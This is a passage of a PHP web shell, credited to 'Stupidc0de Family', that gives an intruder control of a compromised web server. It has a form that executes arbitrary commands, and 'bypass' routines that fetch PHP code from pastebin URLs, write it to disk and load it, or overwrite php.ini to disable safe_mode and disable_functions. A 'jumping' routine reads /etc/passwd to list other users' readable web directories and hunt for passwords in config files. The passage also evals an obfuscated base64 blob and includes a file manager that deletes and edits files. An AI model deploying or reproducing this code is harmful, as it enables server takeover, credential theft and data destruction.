1795.                         }
1796.                         }
1797.                     echo "</center><br /><br />";
1798.                     break;
1799.             }
1800.  
1801. ///////////////////////////
1802.  
1803.             ////////////////////////CMD////////////////////////
1804.  
1805.             elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) {
1806.                 echo "<br/><br/><form method='post'>
1807.                 <font clss='rapihbanget'>Command :</font>
1808.                 <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
1809.                 </form>";
1810.                 if($_POST['execmd']) {
1811.                     echo "<pre>".exe($_POST['cmd'])."</pre>";
1812.                 }
1813.             }
1814.  
1815.             ///////////////////////////////////////////////////
1816.  
1817.             //////////////////////////////////////////////////
1818.             //////////////////////////////////////////////////
1819.             elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls'))
1820.                 {
1821.                     echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
1822.                     <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
1823.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
1824.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
1825.                     <br/><br/><br/><br/>
1826.                     <?php
1827.                 }
1828.             //////////////////////////////////////////////////
1829.             //////////////////////////////////////////////////
1830.  
1831.             ////////////////////////////////////////
1832.             ///////////////////////////////////////
1833.             elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) {
1834.             echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With System Function</span><center>';
1835.             mkdir('bysyswsf', 0755);
1836.             chdir('bysyswsf');
1837.             $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm");
1838.             $file = fopen("bysyswsf.php" ,"w+");
1839.             $write = fwrite ($file ,$bysyswsf);
1840.             fclose($file);
1841.             chmod("bysyswsf.php",0755);
1842.             echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
1843.             }
1844.             ////////////////////////////////////////
1845.             ////////////////////////////////////////
1846.             elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) {
1847.                     $byht = "safe_mode = Off
1848.                     disable_functions = None
1849.                     safe_mode_gid = OFF
1850.                     open_basedir = OFF
1851.                     allow_url_fopen = On";
1852.                     file_put_contents("php.ini",$byht);
1853.                     echo "<script>alert('Congrats! Sukses Bos Q ~_^'); hideAll();</script>";
1854.                     die('<meta http-equiv="refresh" content="0; url=?" />');
1855.             }
1856.             ////////////////////////////////////////
1857.             ///////////////////////////////////////
1858.             elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) {
1859.             echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With Exec Function</span><center>';
1860.             mkdir('bysyswexecf', 0755);
1861.             chdir('bysyswexecf');
1862.             $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd");
1863.             $file = fopen("bysyswexecf.php" ,"w+");
1864.             $write = fwrite ($file ,$bysyswsf);
1865.             fclose($file);
1866.             chmod("bysyswexecf.php",0755);
1867.             echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
1868.             }
1869.             ////////////////////////////////////////
1870.             ////////////////////////////////////////
1871.  
1872.         ///////////////////////////////////////////////////////////////////////////
1873.         ///////////JUMPING////////////////////////////////////////////////////////
1874.         //////////////////////////////////////////
1875.         elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){
1876.                     ?>
1877.                 <form action="?path=<?php echo $pwd; ?>&amp;x=jumping" method="post">
1878.                 <?php
1879.                 //radable public_html
1880.                 ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1881.                 set_time_limit(0);
1882.                 ###################
1883.                 @$passwd = fopen('/etc/passwd','r');
1884.                 if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); }
1885.                 $pub = array();
1886.                 $users = array();
1887.                 $conf = array();
1888.                 $i = 0;
1889.                 while(!feof($passwd))
1890.                 {
1891.                 $str = fgets($passwd);
1892.                 if ($i > 35)
1893.                 {
1894.                 $pos = strpos($str,':');
1895.                 $username = substr($str,0,$pos);
1896.                 $dirz = '/home/'.$username.'/public_html/';
1897.                 if (($username != ''))
1898.                 {
1899.                 if (is_readable($dirz))
1900.                 {
1901.                 array_push($users,$username);
1902.                 array_push($pub,$dirz);
1903.                 }
1904.                 }
1905.                 }
1906.                 $i++;
1907.                 }
1908.                 ###################
1909.                 echo '<br><br></center></center>';
1910.                 echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font>";
1911.                 echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font>";
1912.                 echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
1913.                 foreach ($users as $user)
1914.                 {
1915.                 $path = "/home/$user/public_html/";
1916.                 echo "<font class='rapihbanget'><a href='?path&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>";
1917.                 }
1918.                 echo "<br /><font class='rapihbanget'>[+] Complete...\n"."<br /></font>";
1919.                 echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n"."<br /></font>";
1920.                 echo '<br><br></b></body><center>';
1921.         }
1922. ///////////////
1923. elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";@eval(gzinflate(base64_decode($zoneH))); "</div>"; }
1924. /////////////
1925.  
1926.         /*
1927.         File Manager
1928.         Dimulai Dari Sini
1929.         */
1930. else{
1931.             echo '</table><br />';
1932.             ////////////////////////////////////////////////////////////////////////
1933. /////////////////////////////////////////////////////////////////////////
1934.     echo "<center>";
1935.             if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
1936.             if($_POST['type'] == 'dir'){
1937.             if(rmdir($_POST['path'])){
1938.             echo '<script>alert("Delete Dir Sukses!");</script>';
1939.             }else{
1940.             echo '<script>alert("Delete Dir Gagal!");</script>';
1941.             }
1942.             }elseif($_POST['type'] == 'file'){
1943.             if(unlink($_POST['path'])){
1944.             echo '<script>alert("Delete File Sukses!");</script>';
1945.             }else{
1946.             echo '<script>alert("Delete File Gagal!");</script>';
1947.             }
1948.             }
1949.             }
1950.             echo '</center>';
1951.             $scandir = scandir($path);
1952.             echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
1953.             ';
1954.  
1955.             foreach($scandir as $dir){
1956.             if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
1957.             echo "<tr>
1958.             <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
1959.             <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
1960.             <td><center>";
1961.             if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
1962.             elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>";
1963.             echo perms("$path/$dir");
1964.             if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
1965.  
1966.             echo "</center></td>
1967.             <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
1968.             <select class='bordergaya' name=\"opt\">
1969.             <option value=\"\"></option>
1970.             <option value=\"delete\">Delete</option>
1971.             <option value=\"chmod\">Chmod</option>
1972.             <option value=\"rename\">Rename</option>
1973.             </select>
1974.             <input type=\"hidden\" name=\"type\" value=\"dir\">
1975.             <input type=\"hidden\" name=\"name\" value=\"$dir\">
1976.             <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
1977.             <input class='bordergaya' type=\"submit\" value=\"Execute\" />
1978.             </form></center></td>
1979.             </tr>";
1980.             }
1981.             echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
1982.             foreach($scandir as $file){
1983.             if(!is_file("$path/$file")) continue;
1984.             $size = filesize("$path/$file")/1024;
1985.             $size = round($size,3);
1986.             if($size >= 1024){
1987.             $size = round($size/1024,2).' MB';
1988.             }else{
1989.             $size = $size.' KB';
1990.             }
1991.  
1992.             echo "<tr>
1993.             <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
1994.             <td><center  style='color:orange; font-family:Homenaje;'>".$size."</center></td>
1995.             <td><center>";
1996.             if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
1997.             elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>";
1998.             echo perms("$path/$file");
1999.             if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
2000.             echo "</center></td>
2001.             <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
2002.             <select class='bordergaya' name=\"opt\">
2003.             <option value=\"\"></option>
2004.             <option value=\"delete\">Delete</option>
2005.             <option value=\"chmod\">Chmod</option>
2006.             <option value=\"rename\">Rename</option>
2007.             <option value=\"edit\">Edit</option>
2008.             </select>
2009.             <input type=\"hidden\" name=\"type\" value=\"file\">
2010.             <input type=\"hidden\" name=\"name\" value=\"$file\">
2011.             <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
2012.             <input class='bordergaya' type=\"submit\" value=\"Execute\" />
2013.             </form></center></td>
2014.             </tr>";
2015.             }
2016.             echo '</table>
2017.             </div>';
2018.             }
2019. ///////////////////////////////////////////////////////////////////////
2020. ////////////////////////////////////////////////////////////////////////
2021.            
2022.  
2023.  
2024. ?>
2025. <br/><br/>
2026. <script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("<font face='Fredericka the Great' size='3px' color='grey'>&copy; Stupidc0de Family  " + copyright +"</font> "); </script>
2027. </BODY></html>